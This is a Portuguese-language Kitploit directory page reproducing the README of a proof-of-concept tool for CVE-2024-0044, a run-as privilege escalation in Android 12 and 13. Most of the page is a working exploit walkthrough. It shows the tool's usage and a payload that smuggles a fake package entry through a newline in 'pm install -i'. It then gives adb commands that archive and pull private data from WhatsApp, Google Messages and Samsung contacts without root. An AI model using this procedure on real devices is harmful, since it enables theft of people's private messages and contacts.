Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve_2024_0044 — CVE-2024-0044: uma vulnerabilidade de alta gravidade do tipo "run-as any app" que afeta o Android nas versões 12 e 13 | Kitploit
Ferramentas/GitHubGitHub/hunter24x24/cve_2024_0044
Segurança AndroidEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExfiltração de DadosPós-ExploraçãoTestes de PenetraçãoSegurança Móvel
GitHubhunter24x24/cve_2024_0044

cve_2024_0044

CVE-2024-0044: uma vulnerabilidade de alta gravidade do tipo "run-as any app" que afeta o Android nas versões 12 e 13

Ver Repositório
122há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE 2024 0044

CVE-2024-0044, identificada na função createSessionInternal do arquivo PackageInstallerService.java, é uma vulnerabilidade de alta severidade que afeta as versões 12 e 13 do Android. Essa vulnerabilidade permite que um atacante realize um ataque "run-as any app", levando a uma escalada local de privilégios sem exigir interação do usuário. O problema surge devido a uma validação inadequada de entrada na função createSessionInternal. Um atacante pode explorar isso manipulando o processo de criação de sessão, potencialmente obtendo acesso não autorizado a dados sensíveis e realizando ações não autorizadas no dispositivo afetado​

A exploração foi descoberta por Meta security

A prova de conceito foi resumida e compartilhada por Tiny hack

Detalhes sobre o patch de segurança podem ser encontrados em Android security bulletin

Pré-requisitos

  1. Ative a depuração USB no seu celular e conecte-o à sua máquina usando um cabo USB ou depuração sem fio
  2. Baixe qualquer APK para sua máquina, você pode usar o F-DROID

Como usar a ferramenta

root@kitploit:~
python3 cve_2024_0044.py -h
                                                                               
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#      
        
usage: cve_2024_0044.py [-h] -P P -A A

CVE-2024-0044: run-as any app @Pl4int3xt

options:
  -h, --help  show this help message and exit
  -P P        package name (default: None)
  -A A        apk file path (default: None)

-P é usado para especificar o nome do pacote alvo que você deseja executar como.

-A para especificar o caminho do APK a ser enviado para o dispositivo.

Exploração

Execute a ferramenta python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

Um arquivo payload.txt como este será gerado

root@kitploit:~
PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk

A ferramenta automatiza algumas partes e outras são manuais. Você pode sair após gerar o payload e executar todos os comandos manualmente ou continuar com as instruções.

Em seguida, você precisará se conectar ao seu dispositivo usando adb shell e colar o payload, garantindo que receba uma mensagem Success após o último comando

root@kitploit:~
pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success

Em seguida, obtemos os dados do WhatsApp usando os seguintes comandos

root@kitploit:~
pixel:/ $ mkdir /data/local/tmp/wa/                                                                            
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp

Crie um diretório temporário: mkdir /data/local/tmp/wa/

Crie um placeholder para um arquivo tar: touch /data/local/tmp/wa/wa.tar

Defina permissões amplas: chmod -R 0777 /data/local/tmp/wa/ para garantir que qualquer usuário possa ler, escrever e executar neste diretório.

Mude o contexto do usuário: run-as victim para obter as mesmas permissões que o usuário "victim".

Arquive os dados do aplicativo alvo: tar -cf /data/local/tmp/wa/wa.tar com.whatsapp, criando um tarball do diretório de dados do WhatsApp.

Finalmente, puxe os dados

adb pull /data/local/tmp/wa/wa.tar

Você pode extrair os dados usando 7z ou qualquer outra ferramenta.

Você pode usar o Whatsapp chat exporter para convertê-los para HTML.

Isso permite obter os dados do WhatsApp sem acesso root no seu dispositivo.

Puxando o Google Messages

Apenas altere o nome do pacote da seguinte forma

root@kitploit:~
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.google.android.apps.messaging -A ~/Downloads/F-Droid.apk

Siga as instruções acima e, após puxar o arquivo wa.tar, descompacte-o e abra as conversas em com.google.android.apps.messaging/databases/bugle_db usando sqlitebrowser ou qualquer outra ferramenta.

Puxando contatos

Testado em dispositivo Samsung. Para outros dispositivos, verifique o nome do pacote do provedor de contatos.

root@kitploit:~
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.samsung.android.app.contacts -A ~/Downloads/F-Droid.apk

Siga as instruções acima e, após puxar o arquivo wa.tar, descompacte-o e abra os contatos em com.samsung.android.providers.contacts/databases/contacts2.db usando sqlitebrowser ou qualquer outra ferramenta. O arquivo db contém todas as informações das contas de e-mail do usuário junto com a lista de contatos.

Baixar ferramenta